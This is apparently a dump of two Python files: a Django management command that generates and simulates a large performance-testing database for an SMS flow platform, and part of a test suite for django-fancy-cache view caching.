{\'name\': ""Farmers"", \'query\': None, \'member\': 0.5},\n {\'name\': ""Doctors"", \'query\': None, \'member\': 0.4},\n {\'name\': ""Teachers"", \'query\': None, \'member\': 0.3},\n {\'name\': ""Drivers"", \'query\': None, \'member\': 0.2},\n {\'name\': ""Testers"", \'query\': None, \'member\': 0.1},\n {\'name\': ""Empty"", \'query\': None, \'member\': 0.0},\n {\'name\': ""Youth (Dynamic)"", \'query\': \'age <= 18\', \'member\': lambda c: c[\'age\'] and c[\'age\'] <= 18},\n {\'name\': ""Unregistered (Dynamic)"", \'query\': \'joined = """"\', \'member\': lambda c: not c[\'joined\']},\n {\'name\': ""Districts (Dynamic)"", \'query\': \'district=Faskari or district=Zuru or district=Anka\',\n \'member\': lambda c: c[\'district\'] and c[\'district\'].name in (""Faskari"", ""Zuru"", ""Anka"")},\n)\nLABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"")\nFLOWS = (\n {\'name\': ""Favorites"", \'file\': ""favorites.json"", \'templates\': (\n [""blue"", ""mutzig"", ""bob""],\n [""orange"", ""green"", ""primus"", ""jeb""],\n )},\n {\'name\': ""SMS Form"", \'file\': ""sms_form.json"", \'templates\': ([""22 F Seattle""], [""35 M MIAMI""])},\n {\'name\': ""Pick a Number"", \'file\': ""pick_a_number.json"", \'templates\': ([""1""], [""4""], [""5""], [""7""], [""8""])}\n)\n\n# contact names are generated from these components\nCONTACT_NAMES = (\n ("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""),\n ("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O\'Shea"", ""Poots"", ""Quincy"", ""Roberts""),\n)\nCONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"")\nCONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number\nCONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle\nCONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped\nCONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked\nCONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted\nCONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact\n\nRUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to\nINBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today""))\n\n\nclass Command(BaseCommand):\n COMMAND_GENERATE = \'generate\'\n COMMAND_SIMULATE = \'simulate\'\n\n help = ""Generates a database suitable for performance testing""\n\n def add_arguments(self, parser):\n cmd = self\n subparsers = parser.add_subparsers(dest=\'command\', help=\'Command to perform\',\n parser_class=lambda **kw: CommandParser(cmd, **kw))\n\n gen_parser = subparsers.add_parser(\'generate\', help=\'Generates a clean testing database\')\n gen_parser.add_argument(\'--orgs\', type=int, action=\'store\', dest=\'num_orgs\', default=100)\n gen_parser.add_argument(\'--contacts\', type=int, action=\'store\', dest=\'num_contacts\', default=1000000)\n gen_parser.add_argument(\'--seed\', type=int, action=\'store\', dest=\'seed\', default=None)\n\n sim_parser = subparsers.add_parser(\'simulate\', help=\'Simulates activity on an existing database\')\n sim_parser.add_argument(\'--runs\', type=int, action=\'store\', dest=\'num_runs\', default=500)\n\n def handle(self, command, *args, **kwargs):\n start = time.time()\n\n if command == self.COMMAND_GENERATE:\n self.handle_generate(kwargs[\'num_orgs\'], kwargs[\'num_contacts\'], kwargs[\'seed\'])\n else:\n self.handle_simulate(kwargs[\'num_runs\'])\n\n time_taken = time.time() - start\n 
self._log(""Completed in %d secs, peak memory usage: %d MiB\\n"" % (int(time_taken), int(self.peak_memory())))\n\n def handle_generate(self, num_orgs, num_contacts, seed):\n """"""\n Creates a clean database\n """"""\n seed = self.configure_random(num_orgs, seed)\n\n self._log(""Generating random base database (seed=%d)...\\n"" % seed)\n\n try:\n has_data = Org.objects.exists()\n except Exception: # pragma: no cover\n raise CommandError(""Run migrate command first to create database tables"")\n if has_data:\n raise CommandError(""Can\'t generate content in non-empty database."")\n\n self.batch_size = 5000\n\n # the timespan being modelled by this database\n self.db_ends_on = timezone.now()\n self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)\n\n # this is a new database so clear out redis\n self._log(""Clearing out Redis cache... "")\n r = get_redis_connection()\n r.flushdb()\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD)\n\n country, locations = self.load_locations(LOCATIONS_DUMP)\n orgs = self.create_orgs(superuser, country, num_orgs)\n self.create_users(orgs)\n self.create_channels(orgs)\n self.create_fields(orgs)\n self.create_groups(orgs)\n self.create_labels(orgs)\n self.create_flows(orgs)\n self.create_contacts(orgs, locations, num_contacts)\n\n def handle_simulate(self, num_runs):\n """"""\n Prepares to resume simulating flow activity on an existing database\n """"""\n self._log(""Resuming flow activity simulation on existing database...\\n"")\n\n orgs = list(Org.objects.order_by(\'id\'))\n if not orgs:\n raise CommandError(""Can\'t simulate activity on an empty database"")\n\n self.configure_random(len(orgs))\n\n # in real life Nexmo messages are throttled, but that\'s not necessary for this simulation\n del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO][\'max_tps\']\n\n inputs_by_flow_name = {f[\'name\']: f[\'templates\'] for f in FLOWS}\n\n self._log(""Preparing existing orgs... "")\n\n for org in orgs:\n flows = list(org.flows.order_by(\'id\'))\n for flow in flows:\n flow.input_templates = inputs_by_flow_name[flow.name]\n\n org.cache = {\n \'users\': list(org.get_org_users().order_by(\'id\')),\n \'channels\': list(org.channels.order_by(\'id\')),\n \'groups\': list(ContactGroup.user_groups.filter(org=org).order_by(\'id\')),\n \'flows\': flows,\n \'contacts\': list(org.org_contacts.values_list(\'id\', flat=True)), # only ids to save memory\n \'activity\': None\n }\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n self.simulate_activity(orgs, num_runs)\n\n def configure_random(self, num_orgs, seed=None):\n if not seed:\n seed = random.randrange(0, 65536)\n\n self.random = random.Random(seed)\n\n # monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101\n from temba.utils import models\n models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))\n\n # We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a\n # bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be\n # allocated is (1/N) ^ (1/bias). 
This sets the bias so that the first org will get ~50% of the content:\n self.org_bias = math.log(1.0 / num_orgs, 0.5)\n\n return seed\n\n def load_locations(self, path):\n """"""\n Loads admin boundary records from the given dump of that table\n """"""\n self._log(""Loading locations from %s... "" % path)\n\n # load dump into current db with pg_restore\n db_config = settings.DATABASES[\'default\']\n try:\n check_call(\'export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s\' %\n (db_config[\'PASSWORD\'], db_config[\'USER\'], db_config[\'NAME\'], path), shell=True)\n except CalledProcessError: # pragma: no cover\n raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"")\n\n # fetch as tuples of (WARD, DISTRICT, STATE)\n wards = AdminBoundary.objects.filter(level=3).prefetch_related(\'parent\', \'parent__parent\')\n locations = [(w, w.parent, w.parent.parent) for w in wards]\n\n country = AdminBoundary.objects.filter(level=0).get()\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n return country, locations\n\n def create_orgs(self, superuser, country, num_total):\n """"""\n Creates and initializes the orgs\n """"""\n self._log(""Creating %d orgs... "" % num_total)\n\n org_names = [\'%s %s\' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]\n self.random.shuffle(org_names)\n\n orgs = []\n for o in range(num_total):\n orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),\n brand=\'rapidpro.io\', country=country,\n created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))\n Org.objects.bulk_create(orgs)\n orgs = list(Org.objects.order_by(\'id\'))\n\n self._log(self.style.SUCCESS(""OK"") + ""\\nInitializing orgs... "")\n\n for o, org in enumerate(orgs):\n org.initialize(topup_size=max((1000 - o), 1) * 1000)\n\n # we\'ll cache some metadata on each org as it\'s created to save re-fetching things\n org.cache = {\n \'users\': [],\n \'fields\': {},\n \'groups\': [],\n \'system_groups\': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},\n }\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n return orgs\n\n def create_users(self, orgs):\n """"""\n Creates a user of each type for each org\n """"""\n self._log(""Creating %d users... "" % (len(orgs) * len(USERS)))\n\n # create users for each org\n for org in orgs:\n for u in USERS:\n user = User.objects.create_user(u[\'username\'] % org.id, u[\'email\'] % org.id, USER_PASSWORD)\n getattr(org, u[\'role\']).add(user)\n user.set_org(org)\n org.cache[\'users\'].append(user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_channels(self, orgs):\n """"""\n Creates the channels for each org\n """"""\n self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for c in CHANNELS:\n Channel.objects.create(org=org, name=c[\'name\'], channel_type=c[\'channel_type\'],\n address=c[\'address\'], schemes=[c[\'scheme\']],\n created_by=user, modified_by=user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_fields(self, orgs):\n """"""\n Creates the contact fields for each org\n """"""\n self._log(""Creating %d fields... 
"" % (len(orgs) * len(FIELDS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for f in FIELDS:\n field = ContactField.objects.create(org=org, key=f[\'key\'], label=f[\'label\'],\n value_type=f[\'value_type\'], show_in_table=True,\n created_by=user, modified_by=user)\n org.cache[\'fields\'][f[\'key\']] = field\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_groups(self, orgs):\n """"""\n Creates the contact groups for each org\n """"""\n self._log(""Creating %d groups... "" % (len(orgs) * len(GROUPS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for g in GROUPS:\n if g[\'query\']:\n group = ContactGroup.create_dynamic(org, user, g[\'name\'], g[\'query\'])\n else:\n group = ContactGroup.user_groups.create(org=org, name=g[\'name\'], created_by=user, modified_by=user)\n group.member = g[\'member\']\n group.count = 0\n org.cache[\'groups\'].append(group)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_labels(self, orgs):\n """"""\n Creates the message labels for each org\n """"""\n self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for name in LABELS:\n Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_flows(self, orgs):\n """"""\n Creates the flows for each org\n """"""\n self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for f in FLOWS:\n with open(\'media/test_flows/\' + f[\'file\'], \'r\') as flow_file:\n org.import_app(json.load(flow_file), user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_contacts(self, orgs, locations, num_contacts):\n """"""\n Creates test and regular contacts for this database. 
Returns tuples of org, contact id and the preferred urn\n id to avoid trying to hold all contact and URN objects in memory.\n """"""\n group_counts = defaultdict(int)\n\n self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS)))\n\n for org in orgs:\n test_contacts = []\n for user in org.cache[\'users\']:\n test_contacts.append(Contact.get_test_contact(user))\n org.cache[\'test_contacts\'] = test_contacts\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n self._log(""Creating %d regular contacts...\\n"" % num_contacts)\n\n # disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed\n # count row for every contact\n with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):\n names = [(\'%s %s\' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]\n names = [n if n else None for n in names]\n\n batch_num = 1\n for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):\n batch = []\n\n # generate flat representations and contact objects for this batch\n for c_index in index_batch: # pragma: no cover\n org = self.random_org(orgs)\n name = self.random_choice(names)\n location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None\n created_on = self.timeline_date(c_index / num_contacts)\n\n c = {\n \'org\': org,\n \'user\': org.cache[\'users\'][0],\n \'name\': name,\n \'groups\': [],\n \'tel\': \'+2507%08d\' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,\n \'twitter\': \'%s%d\' % (name.replace(\' \', \'_\').lower() if name else \'tweep\', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,\n \'gender\': self.random_choice((\'M\', \'F\')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'age\': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'joined\': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'ward\': location[0] if location else None,\n \'district\': location[1] if location else None,\n \'state\': location[2] if location else None,\n \'language\': self.random_choice(CONTACT_LANGS),\n \'is_stopped\': self.probability(CONTACT_IS_STOPPED_PROB),\n \'is_blocked\': self.probability(CONTACT_IS_BLOCKED_PROB),\n \'is_active\': self.probability(1 - CONTACT_IS_DELETED_PROB),\n \'created_on\': created_on,\n \'modified_on\': self.random_date(created_on, self.db_ends_on),\n }\n\n # work out which system groups this contact belongs to\n if c[\'is_active\']:\n if not c[\'is_blocked\'] and not c[\'is_stopped\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_ALL])\n if c[\'is_blocked\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_BLOCKED])\n if c[\'is_stopped\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_STOPPED])\n\n # let each user group decide if it is taking this contact\n for g in org.cache[\'groups\']:\n if g.member(c) if callable(g.member) else self.probability(g.member):\n c[\'groups\'].append(g)\n\n # track changes to group counts\n for g in c[\'groups\']:\n group_counts[g] += 1\n\n batch.append(c)\n\n self._create_contact_batch(batch)\n self._log("" > Created batch %d of %d\\n"" % (batch_num, max(num_contacts // self.batch_size, 1)))\n batch_num += 1\n\n # create group count records manually\n counts = []\n for group, count in group_counts.items():\n counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))\n group.count = count\n 
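# membership rows were inserted with triggers disabled, so no group count rows exist yet;\n # write them pre-squashed here (is_squashed=True) to avoid a later squash pass\n 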
ContactGroupCount.objects.bulk_create(counts)\n\n def _create_contact_batch(self, batch):\n """"""\n Bulk creates a batch of contacts from flat representations\n """"""\n for c in batch:\n c[\'object\'] = Contact(org=c[\'org\'], name=c[\'name\'], language=c[\'language\'],\n is_stopped=c[\'is_stopped\'], is_blocked=c[\'is_blocked\'],\n is_active=c[\'is_active\'],\n created_by=c[\'user\'], created_on=c[\'created_on\'],\n modified_by=c[\'user\'], modified_on=c[\'modified_on\'])\n Contact.objects.bulk_create([c[\'object\'] for c in batch])\n\n # now that contacts have pks, bulk create the actual URN, value and group membership objects\n batch_urns = []\n batch_values = []\n batch_memberships = []\n\n for c in batch:\n org = c[\'org\']\n c[\'urns\'] = []\n\n if c[\'tel\']:\n c[\'urns\'].append(ContactURN(org=org, contact=c[\'object\'], priority=50, scheme=TEL_SCHEME,\n path=c[\'tel\'], identity=URN.from_tel(c[\'tel\'])))\n if c[\'twitter\']:\n c[\'urns\'].append(ContactURN(org=org, contact=c[\'object\'], priority=50, scheme=TWITTER_SCHEME,\n path=c[\'twitter\'], identity=URN.from_twitter(c[\'twitter\'])))\n if c[\'gender\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'gender\'],\n string_value=c[\'gender\']))\n if c[\'age\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'age\'],\n string_value=str(c[\'age\']), decimal_value=c[\'age\']))\n if c[\'joined\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'joined\'],\n string_value=datetime_to_str(c[\'joined\']), datetime_value=c[\'joined\']))\n if c[\'ward\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'ward\'],\n string_value=c[\'ward\'].name, location_value=c[\'ward\']))\n if c[\'district\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'district\'],\n string_value=c[\'district\'].name, location_value=c[\'district\']))\n if c[\'state\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'state\'],\n string_value=c[\'state\'].name, location_value=c[\'state\']))\n for g in c[\'groups\']:\n batch_memberships.append(ContactGroup.contacts.through(contact=c[\'object\'], contactgroup=g))\n\n batch_urns += c[\'urns\']\n\n ContactURN.objects.bulk_create(batch_urns)\n Value.objects.bulk_create(batch_values)\n ContactGroup.contacts.through.objects.bulk_create(batch_memberships)\n\n def simulate_activity(self, orgs, num_runs):\n self._log(""Starting simulation. 
Ctrl+C to cancel...\\n"")\n\n runs = 0\n while runs < num_runs:\n try:\n with transaction.atomic():\n # make sure every org has an active flow\n for org in orgs:\n if not org.cache[\'activity\']:\n self.start_flow_activity(org)\n\n with transaction.atomic():\n org = self.random_org(orgs)\n\n if self.probability(0.1):\n self.create_unsolicited_incoming(org)\n else:\n self.create_flow_run(org)\n runs += 1\n\n except KeyboardInterrupt:\n self._log(""Shutting down...\\n"")\n break\n\n squash_channelcounts()\n squash_flowpathcounts()\n squash_flowruncounts()\n prune_recentmessages()\n squash_topupcredits()\n squash_labelcounts()\n\n def start_flow_activity(self, org):\n assert not org.cache[\'activity\']\n\n user = org.cache[\'users\'][0]\n flow = self.random_choice(org.cache[\'flows\'])\n\n if self.probability(0.9):\n # start a random group using a flow start\n group = self.random_choice(org.cache[\'groups\'])\n contacts_started = list(group.contacts.values_list(\'id\', flat=True))\n\n self._log("" > Starting flow %s for group %s (%d) in org %s\\n""\n % (flow.name, group.name, len(contacts_started), org.name))\n\n start = FlowStart.create(flow, user, groups=[group], restart_participants=True)\n start.start()\n else:\n # start a random individual without a flow start\n if not org.cache[\'contacts\']:\n return\n\n contact = Contact.objects.get(id=self.random_choice(org.cache[\'contacts\']))\n contacts_started = [contact.id]\n\n self._log("" > Starting flow %s for contact #%d in org %s\\n"" % (flow.name, contact.id, org.name))\n\n flow.start([], [contact], restart_participants=True)\n\n org.cache[\'activity\'] = {\'flow\': flow, \'unresponded\': contacts_started, \'started\': list(contacts_started)}\n\n def end_flow_activity(self, org):\n self._log("" > Ending flow %s for in org %s\\n"" % (org.cache[\'activity\'][\'flow\'].name, org.name))\n\n org.cache[\'activity\'] = None\n\n runs = FlowRun.objects.filter(org=org, is_active=True)\n FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)\n\n def create_flow_run(self, org):\n activity = org.cache[\'activity\']\n flow = activity[\'flow\']\n\n if activity[\'unresponded\']:\n contact_id = self.random_choice(activity[\'unresponded\'])\n activity[\'unresponded\'].remove(contact_id)\n\n contact = Contact.objects.get(id=contact_id)\n urn = contact.urns.first()\n\n if urn:\n self._log("" > Receiving flow responses for flow %s in org %s\\n"" % (flow.name, flow.org.name))\n\n inputs = self.random_choice(flow.input_templates)\n\n for text in inputs:\n channel = flow.org.cache[\'channels\'][0]\n Msg.create_incoming(channel, six.text_type(urn), text)\n\n # if more than 10% of contacts have responded, consider flow activity over\n if len(activity[\'unresponded\']) <= (len(activity[\'started\']) * 0.9):\n self.end_flow_activity(flow.org)\n\n def create_unsolicited_incoming(self, org):\n if not org.cache[\'contacts\']:\n return\n\n self._log("" > Receiving unsolicited incoming message in org %s\\n"" % org.name)\n\n available_contacts = list(set(org.cache[\'contacts\']) - set(org.cache[\'activity\'][\'started\']))\n if available_contacts:\n contact = Contact.objects.get(id=self.random_choice(available_contacts))\n channel = self.random_choice(org.cache[\'channels\'])\n urn = contact.urns.first()\n if urn:\n text = \' \'.join([self.random_choice(l) for l in INBOX_MESSAGES])\n Msg.create_incoming(channel, six.text_type(urn), text)\n\n def probability(self, prob):\n return self.random.random() < prob\n\n def random_choice(self, seq, bias=1.0):\n if not seq:\n raise 
ValueError(""Can\'t select random item from empty sequence"")\n\n return seq[int(math.pow(self.random.random(), bias) * len(seq))]\n\n def weighted_choice(self, seq, weights):\n r = self.random.random() * sum(weights)\n cum_weight = 0.0\n\n for i, item in enumerate(seq):\n cum_weight += weights[i]\n if r < cum_weight or (i == len(seq) - 1):\n return item\n\n def random_org(self, orgs):\n """"""\n Returns a random org with bias toward the orgs with the lowest indexes\n """"""\n return self.random_choice(orgs, bias=self.org_bias)\n\n def random_date(self, start=None, end=None):\n if not end:\n end = timezone.now()\n if not start:\n start = end - timedelta(days=365)\n\n if start == end:\n return end\n\n return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))\n\n def timeline_date(self, dist):\n """"""\n Converts a 0..1 distance into a date on this database\'s overall timeline\n """"""\n seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()\n\n return self.db_begins_on + timedelta(seconds=(seconds_span * dist))\n\n @staticmethod\n def peak_memory():\n rusage_denom = 1024\n if sys.platform == \'darwin\':\n # OSX gives value in bytes, other OSes in kilobytes\n rusage_denom *= rusage_denom\n return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n\n def _log(self, text):\n self.stdout.write(text, ending=\'\')\n self.stdout.flush()\n\n\nclass DisableTriggersOn(object):\n """"""\n Helper context manager for temporarily disabling database triggers for a given model\n """"""\n def __init__(self, *models):\n self.tables = [m._meta.db_table for m in models]\n\n def __enter__(self):\n with connection.cursor() as cursor:\n for table in self.tables:\n cursor.execute(\'ALTER TABLE %s DISABLE TRIGGER ALL;\' % table)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with connection.cursor() as cursor:\n for table in self.tables:\n cursor.execute(\'ALTER TABLE %s ENABLE TRIGGER ALL;\' % table)\n', 'import unittest\nimport re\nfrom nose.tools import eq_, ok_\nfrom django.test.client import RequestFactory\nfrom django.core.cache import cache\nfrom fancy_cache.memory import find_urls\n\nfrom . 
import views\n\n\nclass TestViews(unittest.TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def tearDown(self):\n cache.clear()\n\n def test_render_home1(self):\n request = self.factory.get(\'/anything\')\n\n response = views.home(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n # do it again\n response = views.home(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_1, random_string_2)\n\n def test_render_home2(self):\n authenticated = RequestFactory(AUTH_USER=\'peter\')\n request = self.factory.get(\'/2\')\n\n response = views.home2(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n # do it again\n response = views.home2(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_1, random_string_2)\n\n # do it again, but with a hint to disable cache\n request = authenticated.get(\'/2\')\n response = views.home2(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n def test_render_home3(self):\n request = self.factory.get(\'/anything\')\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n extra_random_1 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n extra_random_2 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n eq_(random_string_1, random_string_2)\n # the post_process_response is only called once\n eq_(extra_random_1, extra_random_2)\n\n def test_render_home3_no_cache(self):\n factory = RequestFactory(AUTH_USER=\'peter\')\n request = factory.get(\'/3\')\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n ok_(\'In your HTML\' not in response.content.decode(""utf8""))\n\n def test_render_home4(self):\n request = self.factory.get(\'/4\')\n\n response = views.home4(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n extra_random_1 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n\n response = views.home4(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n extra_random_2 = re.findall(\'In your HTML:(\\w+)\', 
response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n eq_(random_string_1, random_string_2)\n # the post_process_response is now called every time\n ok_(extra_random_1 != extra_random_2)\n\n def test_render_home5(self):\n request = self.factory.get(\'/4\', {\'foo\': \'bar\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\', \'other\': \'junk\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_3 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_2, random_string_3)\n\n def test_render_home5bis(self):\n request = self.factory.get(\'/4\', {\'foo\': \'bar\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\', \'bar\': \'foo\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_3 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_2, random_string_3)\n\n def test_remember_stats_all_urls(self):\n request = self.factory.get(\'/anything\')\n response = views.home6(request)\n eq_(response.status_code, 200)\n\n # now ask the memory thing\n match, = find_urls(urls=[\'/anything\'])\n eq_(match[0], \'/anything\')\n eq_(match[2][\'hits\'], 0)\n eq_(match[2][\'misses\'], 1)\n\n # second time\n response = views.home6(request)\n eq_(response.status_code, 200)\n match, = find_urls(urls=[\'/anything\'])\n eq_(match[0], \'/anything\')\n eq_(match[2][\'hits\'], 1)\n eq_(match[2][\'misses\'], 1)\n\n def test_remember_stats_all_urls_looong_url(self):\n request = self.factory.get(\n \'PI:KEY\'\n \'test/that/things/work/with/long/urls/too\',\n {\n \'line1\': \'Bad luck, wind been blowing at my back\',\n \'line2\': ""I was born to bring trouble to wherever I\'m at"",\n \'line3\': ""Got the number thirteen, tattooed on my neck"",\n \'line4\': ""When the ink starts to itch, "",\n \'line5\': ""then the black will turn to red"",\n }\n )\n response = views.home6(request)\n eq_(response.status_code, 200)\n\n # now ask the memory thing\n match, = find_urls()\n ok_(match[0].startswith(\'/something/really\'))\n eq_(match[2][\'hits\'], 0)\n eq_(match[2][\'misses\'], 1)\n\n # second time\n response = views.home6(request)\n eq_(response.status_code, 200)\n match, = find_urls([])\n 
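# each match tuple from find_urls() carries the URL at index 0 and the\n # hit/miss counter dict at index 2, as asserted below\n 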
